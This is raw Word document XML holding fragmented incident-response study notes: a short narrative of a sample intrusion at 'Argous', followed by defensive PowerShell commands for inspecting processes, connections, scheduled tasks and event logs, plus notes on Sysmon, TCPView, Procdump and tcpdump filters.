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Sample accident: Argous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Incidents can get complex very quickly</w:t>
            </w:r>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To illustrate this, we’ll look at a simple incident</w:t>
            </w:r>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Victim’s name is Argous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“Consultants”</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Related to the Argous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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Argous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Scanned the publicly accessible address space of Argous and discovered a firewall, the CRM web application, and the other servers on the internet-isolated network. In this instance the threat actors didn’t take many steps to ne stealthy, while they dis use a VPN to obscure their IPaddress, they scanning activity generated a handful of alerts n the firewall, the IP address of the VPN servers were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 Office_Remoter.exe.</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AssetMgtAcct. Focusing their attention this account, </w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">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Even after killing the 2 processes found on the CRM server, Office Remoter (the proxy) and Ofice_techneter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B7479B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>know thy organization</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C534623" w14:textId="5583AE31"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B7479B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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Network and host visibility are both important</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BC77373"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B7479B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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B7479B">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>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The first decision is always verification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF9F9A8" w14:textId="3AB2A546"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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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119" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E7C8916" w14:textId="77777777" w:rsidR="00F82307" w:rsidRPr="006F5A04" w:rsidRDefault="003E19DA" w:rsidP="003E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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3E19DA">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="9"/>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119" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="41CD2FF7" w14:textId="1F16FD3E" w:rsidR="00F82307"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8653F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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8653F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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8653F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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8653F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="10"/>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C2706D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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Get brief information about running processes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="304C7C70" w14:textId="45F006F0" w:rsidR="008058F2" w:rsidRPr="006F5A04" w:rsidRDefault="00C2706D" w:rsidP="00C2706D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>*’ : Get brief information about a named process with a wildcard.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2446F2F7" w14:textId="33C18F01" w:rsidR="00C2706D" w:rsidRPr="006F5A04" w:rsidRDefault="00C2706D" w:rsidP="00C2706D">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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powershell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>’ |Select-Object * : Detailed information.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7B83FD" w14:textId="2A14F1D7" w:rsidR="00C2706D" w:rsidRPr="006F5A04" w:rsidRDefault="00C2706D" w:rsidP="00F82307">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="11"/>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ComputerName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserv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Get-CimInstance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Get-CimInstance</w:t>
            </w:r>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 xml:space="preserve">PS C: \Users\Sec504&gt; Get-CimInstance -Class Win32_Process | Where-Object -Property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-EQ 644</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F3DEC92" w14:textId="06397B8F" w:rsidR="009956E1" w:rsidRPr="006F5A04" w:rsidRDefault="009956E1" w:rsidP="009956E1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get-CimInstance -Class Win32_Process |</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> : Returns an object with Windows process information, start the PowerShell pipeline with |</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6645CABA" w14:textId="59C9C826" w:rsidR="009956E1" w:rsidRPr="006F5A04" w:rsidRDefault="009956E1" w:rsidP="009956E1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Where-Object :</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Start a loop examining each process returned by Get-CimInstance.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D104BFF" w14:textId="5E3EDD49" w:rsidR="009956E1" w:rsidRPr="006F5A04" w:rsidRDefault="009956E1" w:rsidP="009956E1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">-Property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w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Create a filtering expression based on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property value.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52AF4413" w14:textId="4C3355F8" w:rsidR="009956E1" w:rsidRPr="006F5A04" w:rsidRDefault="009956E1" w:rsidP="00F82307">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="12"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-EQ 644 :</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Display process where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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>EncodedCommand</w:t>
            </w:r>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-EncodedCommand to specify the content of a script. Note that not every -EncodedCommand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r w:rsidR="004D6C2F" w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NetTCPConnection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Get-NetTCPConnection</w:t>
            </w:r>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8416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Notepad making connections to port 80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0840C606" w14:textId="77777777" w:rsidR="008416D3" w:rsidRPr="006F5A04" w:rsidRDefault="008416D3" w:rsidP="008416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>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8416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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8416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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8416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>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8416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Lateral movement implies connections to other internal hosts</w:t>
            </w:r>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hosts/addresses</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="483D9A0B" w14:textId="77777777" w:rsidR="008416D3" w:rsidRPr="006F5A04" w:rsidRDefault="008416D3" w:rsidP="008416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>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8416D3">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="16"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>From incident, or other processes/ connections ( i.e.,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Get-CimInstance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Get-CimInstance</w:t>
            </w:r>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ClassName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserv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Get-ChildItem</w:t>
            </w:r>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w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ItemProperty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Get-ChildItem</w:t>
            </w:r>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ItemProperty</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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LocalUser</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LocalGroupMember</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Look for unusual scheduled tasks.</w:t>
            </w:r>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ScheduledTaskInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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WinEvent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>FilterHashTable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>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network and process information in real time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F3B4D92" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Sysmom</w:t>
            </w:r>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TCPView:</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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="17"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Procdump:</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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Pcapng: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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Unix-like (Linux, macOS, BSD) Windows (windump)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CACCBD0" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Tcpdump -i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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tcpdump -i interface -w file: Captures for an interface and write to a file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="296FC569" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Primitives are composed of one or more qualifiers and an ID</w:t>
            </w:r>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>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303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Dir: the direction (src, dst)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7503845E" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>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Can combine multiple primitives</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D43B240" w14:textId="77777777" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00303D06" w:rsidP="00303D06">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Using and (and, &amp;&amp;) or (or, ||) and not (not</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, !</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</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F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="332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119" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19022A81" w14:textId="16C6E4E8" w:rsidR="0069793F" w:rsidRPr="00E05502" w:rsidRDefault="00E05502" w:rsidP="00E05502">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>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w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="0069793F" w:rsidRPr="00E05502">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>’ :</w:t>
            </w:r>
